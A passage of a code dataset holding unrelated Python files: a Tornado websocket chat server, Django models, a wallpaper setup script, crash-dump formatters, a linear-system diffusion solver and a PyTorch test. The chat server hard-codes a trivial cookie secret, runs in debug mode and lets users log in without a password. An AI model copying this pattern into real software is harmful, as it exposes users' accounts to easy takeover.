to_client_id in SocketHandler.clients:\n SocketHandler.clients[to_client_id].write_message(msg_object)\n\n def on_message(self, message):\n \"\"\"\n {'type': 'init', 'client_number': 22} 表示是初始化的消息\n {'from': 22, 'to': 33, 'message': 'xxx'} 表示需要转发的消息\n :param message:\n :return:\n \"\"\"\n client_id = id(self)\n initJson = json.loads(message)\n if u'type' in initJson and initJson[u'type'] == u'init':\n client_number = initJson[u'client_number']\n self.update_client(client_id, client_number)\n for friend_client_id in SocketHandler.clients.keys():\n if friend_client_id != client_id:\n SocketHandler.send_broadcast_msg(client_number, friend_client_id, 'online')\n elif u'to' in initJson and u'message' in initJson:\n to_client_number = initJson[u'to']\n msg = initJson[u'message']\n from_client_id = client_id\n from_client_number = SocketHandler.client_id_to_num_map[from_client_id]\n for k, v in SocketHandler.client_id_to_num_map.items():\n if v == to_client_number:\n SocketHandler.clients[k].write_message(json.dumps({'type': 'user', 'from_client_id': from_client_id, 'from_client_number': from_client_number, 'msg': msg}))\n\nclass BaseHandler(tornado.web.RequestHandler):\n def get_current_user(self):\n return self.get_secure_cookie(\"username\")\n\nclass IndexHandler(BaseHandler):\n @tornado.web.authenticated\n def get(self):\n self.render('templates/index.html', user=self.current_user)\n\nclass LogoutHandler(BaseHandler):\n def post(self):\n self.clear_cookie(\"username\")\n self.redirect(\"/\")\n\n\nclass LoginHander(BaseHandler):\n def get(self):\n self.render('templates/login.html')\n\n def post(self):\n user = self.get_argument(\"username\")\n if user not in valid_user_dict:\n self.redirect('/login')\n return\n self.set_secure_cookie(\"username\", user)\n self.redirect(\"/\")\n\n\nclass GetClients(tornado.web.RequestHandler):\n def get(self, *args, **kwargs):\n self.write(SocketHandler.client_id_to_num_map)\n\nif __name__ == '__main__':\n settings = {\"static_path\": os.path.join(os.path.dirname(__file__), \"static\"),\n \"cookie_secret\": \"vc\",\n \"login_url\": \"/login\"}\n app = tornado.web.Application([\n (r'/', IndexHandler),\n (r'/login', LoginHander),\n (r'/logout', LogoutHandler),\n (r'/soc', SocketHandler),\n (r'/clients', GetClients),\n ], debug=True, **settings)\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n","repo_name":"supercj92/websocket-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15329741719","text":"from django.db import models\nimport uuid\nfrom django.conf import settings\n\n# Create your models here.\nclass Movie(models.Model):\n\n GENRE_CHOICES = [\n ('action', 'Action'),\n ('comedy', 'Comedy'),\n ('drama', 'Drama'),\n ('horror', 'Horror'),\n ('romance', 'Romance'),\n ('science_fiction', 'Science Fiction'),\n ('fantasy', 'Fantasy'),\n ]\n\n uu_id = models.UUIDField(default=uuid.uuid4)\n title = models.CharField(max_length=255)\n description = models.TextField()\n release_date = models.DateField()\n genre = models.CharField(max_length=100, choices=GENRE_CHOICES)\n length = models.PositiveIntegerField()\n image_card = models.ImageField(upload_to='movie_images/')\n image_cover = models.ImageField(upload_to='movie_images/')\n video = models.FileField(upload_to='movie_videos/')\n movie_views = models.IntegerField(default=0)\n\n def __str__(self):\n return self.title\n \nclass MovieList(models.Model):\n owner_user = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE,\n )\n movie = models.ForeignKey(Movie, on_delete=models.CASCADE)","repo_name":"tomitokko/django-netflix-clone","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"14355291723","text":"from img_downloader import source_code_shortner\nfrom img_downloader import inter_add_new_img\nfrom bs4 import BeautifulSoup\nfrom bs4 import SoupStrainer\nimport urllib.request\nimport re\nimport pickle\nfrom config import *\nprint('Enter genres of wallpaper you like')\nwhile True:\n genere=input()\n generes[genere]=[1,1]\n print('add more(yes/no)')\n choice=input()\n if choice !='yes':\n break\nfile=open('temp.pickle','wb')\npickle.dump(generes,file)\nfile.close()\nfile=open('genere_count_data.pickle','wb')\nprint('counting the number of wallpapers in each genre')\nfor genere in generes:\n url='https://wall.alphacoders.com/search.php?search='+genere\n only_h1_tags=SoupStrainer('h1')\n source_code=urllib.request.urlopen(url)\n source_code=source_code_shortner(source_code,700,800)\n soup=BeautifulSoup(source_code,'html.parser',parse_only=only_h1_tags)\n re_str=str(soup.contents[0])\n result=re.search(' [0-9]* ',re_str)\n genere_wallpic_count[genere]=int(result.group())\n print(str(result.group())+' wallpapers found in '+genere)\npickle.dump(genere_wallpic_count,file)\nfile.close()\nprint('Do you want to download initial wallpapers(It might take time)(yes/no)')\ninput=input()\nif input == 'yes':\n # Download 10 wallpapers\n print('downloading initial wallpapers')\n for _ in range(10):\n inter_add_new_img()\nelse:\n print('Then copy 10 wallpapers of your choice to the directory '+wallpic_dir)\n# set the app to startup\nos.rename(\n 'main.pyw - Shortcut.lnk',\n'C:\\\\Users\\\\'+os.getlogin()+'\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\main.pyw - Shortcut.lnk')\nprint('Restart your computer to launch the application')\n","repo_name":"sanchit96N/WALLPICker","sub_path":"first_time_only.py","file_name":"first_time_only.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15102955794","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;\n\ncrashdump_use_jinja2 = False\n\ndef _(msg):\n return msg\n\ndef tag_a(name, title=None, href=None, alt=None):\n from xml.etree.ElementTree import Element, tostring\n a = Element('a')\n a.text = name\n if href:\n a.set('href', href)\n if title:\n a.set('title', title)\n if alt:\n a.set('alt', alt)\n return tostring(a, encoding=\"utf8\", method='html').decode()\n\ndef _hex_format(number, prefix='0x', width=None, bits=None):\n if isinstance(number, str):\n try:\n number = int(number)\n except ValueError:\n number = None\n if number is None:\n return '(none)'\n if bits is not None:\n if bits == 32:\n number = number & 0xffffffff\n if width is None:\n width = 8\n elif bits == 64:\n number = number & 0xffffffffffffffff\n if width is None:\n width = 16\n\n if width is None:\n if number > 2**48:\n width = 16\n elif number > 2**40:\n width = 12\n elif number > 2**32:\n width = 10\n elif number > 2**24:\n width = 8\n elif number > 2**16:\n width = 6\n elif number > 2**8:\n width = 4\n else:\n width = 2\n fmt = '%%0%ix' % width\n return prefix + fmt % number\n\ndef hex_format(number, prefix='0x', width=None, bits=None):\n if isinstance(number, list):\n nums = []\n for n in number:\n nums.append(_hex_format(n, prefix, width, bits))\n return ','.join(nums)\n else:\n return _hex_format(number, prefix, width, bits)\n\ndef hex_format_bits(number, bits):\n return hex_format(number, bits=bits)\n\ndef addr_format(number, prefix='0x', bits=64):\n if number == 0:\n return 'NULL'\n elif number < 256:\n return hex_format(number, 'NULL+' + prefix, bits=bits)\n else:\n return hex_format(number, prefix, bits=bits)\n\ndef addr_format_64(number, prefix='0x'):\n if number == 0:\n return 'NULL'\n elif number < 256:\n return hex_format(number, 'NULL+' + prefix, bits=64)\n else:\n return hex_format(number, prefix, bits=64)\n\ndef addr_format_32(number, prefix='0x'):\n if number == 0:\n return 'NULL'\n elif number < 256:\n return hex_format(number, 'NULL+' + prefix, bits=32)\n else:\n return hex_format(number, prefix, bits=32)\n\ndef addr_format_bits(number, bits=64):\n return addr_format(number, bits=bits)\n\ndef exception_code(platform_type, code, name):\n if platform_type is None:\n return 'Platform unknown'\n elif platform_type == 'Linux':\n return tag_a(str(name) + '(' + hex_format(code) + ')', href='https://en.wikipedia.org/wiki/Unix_signal')\n elif platform_type == 'Windows NT':\n return tag_a(str(name) + '(' + hex_format(code) + ')', href='https://en.wikipedia.org/wiki/Windows_NT')\n elif platform_type == 'Windows':\n return tag_a(str(name) + '(' + hex_format(code) + ')', href='https://en.wikipedia.org/wiki/Microsoft_Windows')\n else:\n return tag_a(str(name) + '(' + hex_format(code) + ')', href='https://en.wikipedia.org/wiki/Special:Search/' + str(platform_type))\n\ndef format_bool_yesno(val):\n if isinstance(val, str) or isinstance(val, unicode):\n try:\n val = bool(val)\n except ValueError:\n val = None\n if val is None:\n return '(none)'\n elif val == True:\n return _('yes')\n elif val == False:\n return _('no')\n else:\n return _('neither')\n\ndef format_source_line(source, line, line_offset=None, source_url=None):\n if source is None:\n return _('unknown')\n else:\n title = str(source) + ':' + str(line)\n if line_offset is not None:\n title += '+' + hex_format(line_offset)\n if source_url is not None:\n href = source_url\n else:\n href='file:///' + str(source)\n return tag_a(title, href=href)\n\ndef format_function_plus_offset(function, funcoff=None):\n if function is None:\n return _('unknown')\n else:\n if funcoff:\n return str(function) + '+' + hex_format(funcoff)\n else:\n return str(function)\n\ndef str_or_unknown(str):\n if str is None:\n return _('unknown')\n else:\n return str\n\ndef format_cpu_type(cputype):\n cputype = cputype.lower()\n if cputype == 'amd64':\n href='http://en.wikipedia.org/wiki/X86-64'\n title = 'x86-64 (also known as x64, x86_64 and AMD64)'\n elif cputype == 'x86':\n href='http://en.wikipedia.org/wiki/X86'\n title = 'x86 (also known as i386)'\n elif cputype == 'mips':\n href='http://en.wikipedia.org/wiki/MIPS_instruction_set'\n title = 'MIPS instruction set'\n elif cputype == 'alpha':\n href='http://en.wikipedia.org/wiki/DEC_Alpha'\n title = 'Alpha, originally known as Alpha AXP'\n elif cputype == 'alpha64':\n href='http://en.wikipedia.org/wiki/DEC_Alpha'\n title = 'Alpha64, originally known as Alpha AXP'\n elif cputype == 'powerpc':\n href='http://en.wikipedia.org/wiki/PowerPC'\n title = 'PowerPC'\n elif cputype == 'powerpc64':\n href='http://en.wikipedia.org/wiki/Ppc64'\n title = 'PowerPC64 or ppc64'\n elif cputype == 'arm':\n href='http://en.wikipedia.org/wiki/ARM_architecture'\n title = 'ARM'\n elif cputype == 'arm64':\n href='http://en.wikipedia.org/wiki/ARM_architecture#64-bit'\n title = 'ARM 64-bit'\n elif cputype == 'sparc':\n href='http://en.wikipedia.org/wiki/SPARC'\n title = 'SPARC (\"scalable processor architecture\")'\n elif cputype == 'ia64':\n href='http://en.wikipedia.org/wiki/Itanium'\n title = 'Intel Itanium architecture (IA-64)'\n elif cputype == 'msil':\n href='http://en.wikipedia.org/wiki/Common_Intermediate_Language'\n title = 'Microsoft Intermediate Language (MSIL)'\n elif cputype == 'x64 wow':\n href='http://en.wikipedia.org/wiki/WoW64'\n title = 'Microsoft WoW64'\n else:\n href = 'http://en.wikipedia.org/wiki/Central_processing_unit'\n title = 'Unknown:%s' % cputype\n return tag_a(title, title=cputype, href=href)\n\ndef format_cpu_vendor(vendor):\n if vendor == 'AuthenticAMD':\n title = 'AMD'\n href = 'http://en.wikipedia.org/wiki/Advanced_Micro_Devices'\n elif vendor == 'GenuineIntel':\n title = 'Intel'\n href = 'http://en.wikipedia.org/wiki/Intel'\n elif vendor == 'Microsoft Hv':\n title = 'Microsoft Hyper-V'\n href = 'http://en.wikipedia.org/wiki/Hyper-V'\n elif vendor == 'VMwareVMware':\n title = 'VMware'\n href = 'http://en.wikipedia.org/wiki/VMware'\n elif vendor == 'KVMKVMKVMKVM':\n title = 'KVM'\n href = 'http://en.wikipedia.org/wiki/Kernel-based_Virtual_Machine'\n elif vendor == 'XenVMMXenVMM':\n title = 'Xen'\n href = 'http://en.wikipedia.org/wiki/Xen'\n else:\n title = vendor\n href = 'http://en.wikipedia.org/wiki/List_of_x86_manufacturers'\n return tag_a(title, title=vendor, href=href)\n\ndef format_cpu_name(vendor, name):\n # http://en.wikipedia.org/wiki/CPUID\n # http://www.sandpile.org/x86/cpuid.htm\n if vendor == 'AuthenticAMD':\n if name is None:\n title = 'Unknown AMD CPU'\n href = 'http://en.wikipedia.org/wiki/Advanced_Micro_Devices'\n elif name.startswith('AMD Ryzen'):\n href = 'https://en.wikipedia.org/wiki/Ryzen'\n title = 'AMD Ryzen'\n elif name.startswith('AMD FX'):\n href = 'http://en.wikipedia.org/wiki/List_of_AMD_FX_microprocessors'\n title = 'AMD FX-series'\n elif name.startswith('AMD Phenom'):\n href = 'https://en.wikipedia.org/wiki/List_of_AMD_Phenom_microprocessors'\n title = 'AMD Phenom family'\n elif name.startswith('AMD Opteron'):\n href = 'https://en.wikipedia.org/wiki/List_of_AMD_Opteron_microprocessors'\n title = 'AMD Opteron family'\n elif name.startswith('AMD Sempron'):\n href = 'https://en.wikipedia.org/wiki/List_of_AMD_Sempron_microprocessors'\n title = 'AMD Sempron family'\n elif name.startswith('AMD Turion'):\n href = 'https://en.wikipedia.org/wiki/List_of_AMD_Turion_microprocessors'\n title = 'AMD Turion family'\n elif name.startswith('AMD A'):\n href = 'https://en.wikipedia.org/wiki/List_of_AMD_accelerated_processing_unit_microprocessors'\n title = 'AMD APU series'\n else:\n title = 'Unknown AMD CPU'\n href = 'http://en.wikipedia.org/wiki/Advanced_Micro_Devices'\n title = title + ' (%s)' % name\n elif vendor == 'GenuineIntel':\n if name is None:\n title = 'Unknown Intel CPU'\n href = 'https://en.wikipedia.org/wiki/List_of_Intel_microprocessors'\n elif name.startswith('Intel(R) Core(TM) i3'):\n title = 'Intel Core i3 series'\n href = 'http://en.wikipedia.org/wiki/Intel_Core'\n elif name.startswith('Intel(R) Core(TM) i5'):\n title = 'Intel Core i5 series'\n href = 'http://en.wikipedia.org/wiki/Intel_Core'\n elif name.startswith('Intel(R) Core(TM) i7'):\n title = 'Intel Core i7 series'\n href = 'http://en.wikipedia.org/wiki/Intel_Core'\n elif name.startswith('Intel(R) Core(TM) i9'):\n title = 'Intel Core i9 series'\n href = 'http://en.wikipedia.org/wiki/Intel_Core'\n elif name.startswith('Intel(R) Core(TM)'):\n title = 'Unknown Intel Core series'\n href = 'http://en.wikipedia.org/wiki/Intel_Core'\n elif name.startswith('Intel(R) Xeon(R)') or name.startswith('Intel(R) Xeon(TM)'):\n title = 'Intel Xeon series'\n href = 'http://en.wikipedia.org/wiki/Xeon'\n else:\n title = 'Unknown Intel CPU'\n href = 'https://en.wikipedia.org/wiki/List_of_Intel_microprocessors'\n title = title + ' (%s)' % name\n else:\n title = name\n href = 'http://en.wikipedia.org/wiki/List_of_x86_manufacturers'\n return tag_a(name, title=title, href=href)\n\ndef format_distribution_id(distro_id):\n if distro_id == 'Debian':\n name = 'Debian'\n href = 'http://www.debian.org'\n elif distro_id == 'Ubuntu':\n name = 'Ubuntu'\n href = 'http://www.ubuntu.com'\n else:\n name = distro_id\n href = 'http://distrowatch.com/' + distro_id\n return tag_a(name, title=distro_id, href=href)\n\ndef format_distribution_codename(distro_id, distro_codename):\n if distro_id == 'Debian':\n name = '%s %s' % (distro_id.capitalize(), distro_codename.capitalize())\n href = 'http://www.debian.org/%s%s' % (distro_id.capitalize(), distro_codename.capitalize())\n elif distro_id == 'Ubuntu':\n name = '%s %s' % (distro_id.capitalize(), distro_codename.capitalize())\n href = 'http://ubuntuguide.org/wiki/%s_%s' % (distro_id.capitalize(), distro_codename.capitalize())\n else:\n name = distro_id\n href = 'http://distrowatch.com/' + distro_id\n return tag_a(name, title=distro_id, href=href)\n\ndef format_seconds(s):\n if s is None:\n return 'None'\n elif s >= 3600:\n hr = int(float(s) / 3600.0)\n from math import fmod\n m = fmod(float(s), 3600.0) / 60.0\n return '%ihr %0.1fmin' % (hr, m)\n elif s >= 60:\n m = float(s) / 60.0\n return '%0.1fmin' % m\n elif s >= 1:\n return '%0.1fs' % s\n else:\n return '%0.1fms' % ( s * 1000.0 )\n\ndef format_milliseconds(ms):\n if ms is None:\n return 'None'\n elif ms > 1000:\n s = float(ms) / 1000.0\n return format_seconds(s)\n else:\n return '%ims' % ms\n\ndef format_trust_level(tl):\n if tl == 0 or tl is None:\n return 'Unknown'\n elif tl == 1:\n return 'Stack scan'\n elif tl == 2:\n return 'CFI scan'\n elif tl == 3:\n return 'FP'\n elif tl == 4:\n return 'CFI'\n elif tl == 5:\n return 'External'\n elif tl == 6:\n return 'IP'\n else:\n return 'unknown(%i)' % tl\n\n_suffixes = ['B', 'KB', 'MB', 'GB', 'TB', 'PB']\ndef format_size(nbytes):\n if isinstance(nbytes, str):\n try:\n nbytes = int(nbytes)\n except ValueError:\n nbytes = None\n if nbytes == 0: return '0 B'\n elif nbytes is None: return 'None'\n i = 0\n while nbytes >= 1024 and i < len(_suffixes)-1:\n nbytes /= 1024.\n i += 1\n f = ('%.2f' % nbytes).rstrip('0').rstrip('.')\n return '%s %s' % (f, _suffixes[i])\n\ndef format_memory_usagetype(usage):\n if usage == 0 or usage is None:\n return 'Unknown'\n elif usage == 1:\n return 'Stack'\n elif usage == 2:\n return 'TEB'\n elif usage == 3:\n return 'PEB'\n elif usage == 4:\n return 'Process Parameters'\n elif usage == 5:\n return 'Environment'\n elif usage == 6:\n return 'IP'\n elif usage == 7:\n return 'Process Heap Handles'\n elif usage == 8:\n return 'Process Heap'\n elif usage == 9:\n return 'TLS'\n elif usage == 10:\n return 'Thread info block'\n else:\n return 'unknown(%i)' % usage\n\ndef format_gl_extension_name(ext):\n khronos_extension_base_url = 'https://www.khronos.org/registry/OpenGL/extensions'\n unknown_extension_url = 'https://www.khronos.org/opengl/wiki/OpenGL_Extension'\n title = ext\n name = ext\n href = unknown_extension_url\n vendor = None\n ext_name = None\n if ext.startswith('GL_'):\n vendor_end = ext.index('_', 3)\n if vendor_end > 0:\n vendor = ext[3:vendor_end]\n ext_name = ext[3:]\n elif ext.startswith('GLX_') or ext.startswith('WGL_'):\n vendor_end = ext.index('_', 4)\n if vendor_end > 0:\n vendor = ext[4:vendor_end]\n ext_name = ext\n if vendor and ext_name:\n href = khronos_extension_base_url + '/%s/%s.txt' % (vendor, ext_name)\n return tag_a(name, title=title, href=href)\n\ndef format_version_number(num):\n if isinstance(num, str) or isinstance(num, unicode):\n try:\n num = int(num)\n except ValueError:\n num = None\n if num is None: return 'None'\n m, n, o, p = (num >> 48) & 0xffff, (num >> 32) & 0xffff, (num >> 16) & 0xffff, (num >> 0) & 0xffff\n return '%i.%i.%i.%i' % (m, n, o, p)\n\ndef format_platform_type(platform_type):\n if platform_type is None:\n return _('Platform unknown')\n elif platform_type == 'Linux':\n return tag_a('Linux', href='https://en.wikipedia.org/wiki/Linux')\n elif platform_type == 'Windows NT':\n return tag_a('Windows NT',href='https://en.wikipedia.org/wiki/Windows_NT')\n elif platform_type == 'Windows':\n return tag_a('Windows', href='https://en.wikipedia.org/wiki/Microsoft_Windows')\n else:\n return tag_a(platform_type, href='https://en.wikipedia.org/wiki/Special:Search/' + str(platform_type))\n\ndef _get_version_digit(s):\n i = -1\n for j, c in enumerate(s):\n if not str.isnumeric(c):\n i = j\n break\n if i > 0:\n s = s[0:i]\n ret = None\n try:\n ret = int(s)\n except ValueError:\n pass\n return ret\n\ndef _get_version_from_string(number_str):\n elems = number_str.split('.')\n major = 0\n minor = 0\n patch = 0\n build = 0\n if len(elems) >= 1:\n major = _get_version_digit(elems[0])\n if len(elems) >= 2:\n minor = _get_version_digit(elems[1])\n if len(elems) >= 3:\n patch = _get_version_digit(elems[2])\n if len(elems) >= 4:\n build = _get_version_digit(elems[3])\n return major, minor, patch, build\n\ndef _get_version_from_numbers(os_version_number, os_build_number):\n #print('_get_version_from_numbers %s, %s' % (os_version_number, os_build_number))\n if isinstance(os_version_number, int):\n major = os_version_number >> 48 & 0xffff\n minor = os_version_number >> 32 & 0xffff\n patch = os_version_number >> 16 & 0xffff\n build = os_version_number & 0xffff\n if build == 0 and os_build_number:\n build = int(os_build_number) if os_build_number is not None else 0\n else:\n major, minor, patch, build = _get_version_from_string(os_version_number)\n #print('%x, %s -> %i.%i.%i.%i' % (os_version_number, os_build_number, major, minor, patch, build))\n return major, minor, patch, build\n\ndef get_os_version_number(platform_type, os_version_number, os_build_number):\n if platform_type is None or os_version_number is None:\n return 0\n if platform_type == 'Linux':\n major, minor, patch, build = _get_version_from_string(os_version_number)\n elif platform_type == 'Windows NT':\n major, minor, patch, build = _get_version_from_string(os_version_number)\n if major >= 10:\n build = patch\n patch = 0\n else:\n major = 0\n minor = 0\n patch = 0\n build = 0\n ret = (major << 48) | (minor << 32) | (patch << 16) | build\n #print('ver in %s -> %x' % (os_version_number, ret))\n return ret\n\ndef get_os_build_number(platform_type, os_version_number, os_build_number):\n if platform_type is None or os_version_number is None:\n return 0\n if platform_type == 'Linux':\n build = 0\n elif platform_type == 'Windows NT':\n major, minor, patch, build = _get_version_from_string(os_version_number)\n if major >= 10:\n build = patch\n else:\n build = 0\n #print('build in %s -> %x' % (os_version_number, build))\n return build\n\ndef os_version_info(platform_type, os_version_number, os_build_number):\n ret = {'text': 'unknown' }\n if platform_type is None or os_version_number is None:\n return ret\n major, minor, patch, build = _get_version_from_numbers(os_version_number, os_build_number)\n if platform_type == 'Linux':\n ret['text'] = 'Linux %i.%i.%i.%i' % (major, minor, patch, build)\n ret['href'] = 'https://en.wikipedia.org/wiki/Linux'\n elif platform_type == 'Windows NT':\n productName = 'Windows %i.%i' % (major, minor)\n marketingName = None\n if (major < 6):\n productName = \"Windows XP\"\n ret['short'] = 'WinXP'\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_XP'\n elif (major == 6 and minor == 0):\n productName = \"Windows Vista\"\n ret['short'] = 'WinVista'\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_Vista'\n elif (major == 6 and minor == 1):\n productName = \"Windows 7\"\n ret['short'] = 'Win7'\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_7'\n elif (major == 6 and minor == 2):\n productName = \"Windows 8\"\n ret['short'] = 'Win8'\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_8'\n elif (major == 6 and minor == 3):\n productName = \"Windows 8.1\"\n ret['short'] = 'Win8.1'\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_8'\n elif (major == 10):\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_10'\n # See https://en.wikipedia.org/wiki/Windows_10_version_history\n if build <= 10240:\n ret['short'] = 'Win10'\n productName = \"Windows 10\"\n marketingName = ''\n elif(build <= 10586):\n ret['short'] = 'Win10/1511'\n productName = \"Windows 10 Version 1511\"\n marketingName = \"November Update\"\n elif (build <= 14393):\n ret['short'] = 'Win10/1607'\n productName = \"Windows 10 Version 1607\"\n marketingName = \"Anniversary Update\"\n elif (build <= 15063):\n ret['short'] = 'Win10/1703'\n productName = \"Windows 10 Version 1703\"\n marketingName = \"Creators Update\"\n elif (build <= 16299):\n ret['short'] = 'Win10/1709'\n productName = \"Windows 10 Version 1709\"\n marketingName = \"Fall Creators Update\"\n elif (build <= 17134):\n ret['short'] = 'Win10/1803'\n productName = \"Windows 10 Version 1803\"\n marketingName = \"April 2018 Update\"\n elif (build <= 18204):\n ret['short'] = 'Win10/1809'\n productName = \"Windows 10 Version 1809\"\n marketingName = \"October 2018 Update\"\n elif (build <= 18362):\n ret['short'] = 'Win10/1903'\n productName = \"Windows 10 Version 1903\"\n marketingName = \"May 2019 Update\"\n elif (build <= 18363):\n ret['short'] = 'Win10/1909'\n productName = \"Windows 10 Version 1909\"\n marketingName = \"November 2019 Update\"\n elif (build <= 19041):\n ret['short'] = 'Win10/2004'\n productName = \"Windows 10 Version 2004\"\n marketingName = \"May 2020 Update\"\n elif (build <= 19042):\n ret['short'] = 'Win10/20H2'\n productName = \"Windows 10 Version 20H2\"\n marketingName = '20H2'\n elif (build <= 19043):\n ret['short'] = 'Win10/21H1'\n productName = \"Windows 10 Version 21H1\"\n marketingName = '21H1'\n elif (build <= 19044):\n ret['short'] = 'Win10/21H2'\n productName = \"Windows 10 Version 21H2\"\n marketingName = '21H2'\n elif (build <= 19045):\n ret['short'] = 'Win10/22H2'\n productName = \"Windows 10 Version 22H2\"\n marketingName = '22H2'\n else:\n ret['short'] = 'Win10/TBA'\n productName = 'Windows 10 Build %i' % build\n elif (major == 11):\n ret['href'] = 'https://en.wikipedia.org/wiki/Windows_11'\n # See https://en.wikipedia.org/wiki/Windows_11_version_history\n if (build <= 22000):\n ret['short'] = 'Win11/21H2'\n productName = \"Windows 11 Version 21H2\"\n marketingName = '21H2'\n elif (build <= 22621):\n ret['short'] = 'Win11/22H2'\n productName = \"Windows 11 Version 22H2\"\n marketingName = '21H2'\n else:\n ret['short'] = 'Win11/TBA'\n productName = 'Windows 11 Build %i' % build\n if marketingName:\n ret['text'] = '%s (%s)' % (productName, marketingName)\n else:\n ret['text'] = productName\n ret['full'] = ret['text'] + ' %i.%i.%i.%i' % (major, minor, patch, build)\n\n elif platform_type == 'Windows':\n ret['text'] = 'Windows %i.%i' % (major, minor)\n ret['href'] = 'https://en.wikipedia.org/wiki/Microsoft_Windows'\n return ret\n\ndef format_os_version(platform_type, os_version_number, os_build_number):\n info = os_version_info(platform_type, os_version_number, os_build_number)\n if 'href' in info:\n return tag_a(info.get('text'), href=info.get('href'))\n else:\n return info.get('text')\n\ndef format_os_version_short(platform_type, os_version_number, os_build_number):\n info = os_version_info(platform_type, os_version_number, os_build_number)\n if 'short' in info:\n return info.get('short')\n else:\n return info.get('text')\n\ndef language_from_qlocale_language_enum(num):\n _codes = {\n 0: 'Any language',\n 31: 'English',\n 42: 'German',\n }\n if num in _codes:\n return _codes[num]\n else:\n return str(num)\n\n# See https://doc.qt.io/qt-5/qlocale.html#Country-enum\ndef country_from_qlocale_country_enum(num):\n _codes = {\n 0: 'Any country',\n 82: 'Germany',\n 224: 'United Kingdom',\n 225: 'United States',\n }\n if num in _codes:\n return _codes[num]\n else:\n return str(num)\n\n# https://doc.qt.io/qt-5/qlocale.html#Script-enum\ndef script_from_qlocale_script_enum(num):\n _codes = {\n 0: 'Any script',\n 1: 'Arabic',\n 2: 'Cyrillic',\n 16: 'Greek',\n 7: 'Latin',\n }\n if num in _codes:\n return _codes[num]\n else:\n return str(num)\n\ndef thread_extra_info(thread):\n if thread is None:\n return _('N/A')\n elif thread.main_thread:\n return '*@' if thread.exception else '@'\n elif thread.rpc_thread:\n return '*[RPC]' if thread.exception else '[RPC]'\n elif thread.exception:\n return '*'\n else:\n return ''\n\ndef format_thread(thread):\n if thread is None:\n return _('N/A')\n else:\n if thread.main_thread:\n ret = _('Main thread')\n elif thread.rpc_thread:\n ret = _('RPC thread')\n else:\n ret = _('Thread')\n ret = ret + ' ' + hex_format(thread.id)\n if thread.name:\n ret = ret + ' ' + thread.name\n if thread.exception:\n ret = ret + ' ' + _('with exception')\n return ret\n\ndef format_stack_frame(frame):\n if frame is None:\n return _('N/A')\n else:\n if frame.function is None:\n offset = frame.addr - frame.module_base\n if frame.module:\n return frame.module + '+' + hex_format(offset)\n else:\n return frame.addr\n else:\n return format_function_plus_offset(frame.function, frame.funcoff)\n\nif __name__ == '__main__':\n x = _get_version_from_string(\"6.1 Service Pack 1\")\n print(x)","repo_name":"aroth-arsoft/arsoft-web-crashupload","sub_path":"app/crashdump/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":25830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16266555557","text":"import numpy as np\n\ndef BackSub(aug_matrix,x):\n \"\"\"back substitute a N by N system after Gauss elimination\n\n Args:\n aug_matrix: augmented matrix with zeros below the diagonal\n x: length N vector to hold solution\n Returns:\n nothing\n Side Effect:\n x now contains solution\n \"\"\"\n N = x.size\n for row in range(N-1,-1,-1):\n RHS = aug_matrix[row,N]\n for column in range(row+1,N):\n RHS -= x[column]*aug_matrix[row,column]\n x[row] = RHS/aug_matrix[row,row]\n return\ndef swap_rows(A, a, b):\n \"\"\"Rows two rows in a matrix, switch row a with row b\n \n args: \n A: matrix to perform row swaps on\n a: row index of matrix\n b: row index of matrix\n \n returns: nothing\n \n side effects:\n changes A to rows a and b swapped\n \"\"\"\n assert (a>=0) and (b>=0)\n N = A.shape[0] #number of rows\n assert (a0):\n A[i,i-1] = -0.5*(D(r)+D(r-Delta_r))/(Delta_r * V[i])*S[i] \n A[i,i] += 0.5/(Delta_r * V[i])*((D(r)+D(r-Delta_r))*S[i])\n A[i,i+1] = -0.5*(D(r)+D(r+Delta_r))/(Delta_r * V[i])*S[i+1]\n b[i] = Q(r)\n \n #solve system\n phi = GaussElimPivotSolve(A,b)\n #remove last element of phi because it is outside the domain\n phi = phi[0:I]\n return centers, phi\n\n","repo_name":"DrRyanMc/CompNucEng","sub_path":"ch18.py","file_name":"ch18.py","file_ext":"py","file_size_in_byte":5527,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"11995142220","text":"# to hold tests\nimport cv2\nimport torch\nimport torch.nn as nn\nfrom torchsummary import summary\n\nfrom utils import visualize_vid, visualize_waveform, to_categorical\nfrom gen_synthetic import DataGen\nfrom models import ConvNet3D\n\ndef test_model():\n\n no_classes = 76\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n learning_rate = 0.001\n\n input = torch.randn(200, 1, 60, 25, 25, requires_grad=True).to(device)\n target = torch.empty(200, dtype=torch.long).random_(no_classes).to(device)\n\n # https://stackoverflow.com/questions/62456558/is-one-hot-encoding-required-for-using-pytorchs-cross-entropy-loss-function\n # doesnt need one hot encoding if using categorical cross entropy loss\n # if want to use target as one hot vector then need to use nn.functional.log_softmax + nn.NLLLoss\n #target = to_categorical(target, no_classes)\n #target = torch.from_numpy(target).to(device)\n #print(input, target)\n print(target)\n #print(target[0])\n\n model = ConvNet3D(no_classes).to(device)\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n criterion = nn.CrossEntropyLoss()\n print(model)\n summary(model, input_size=(1, 60, 25, 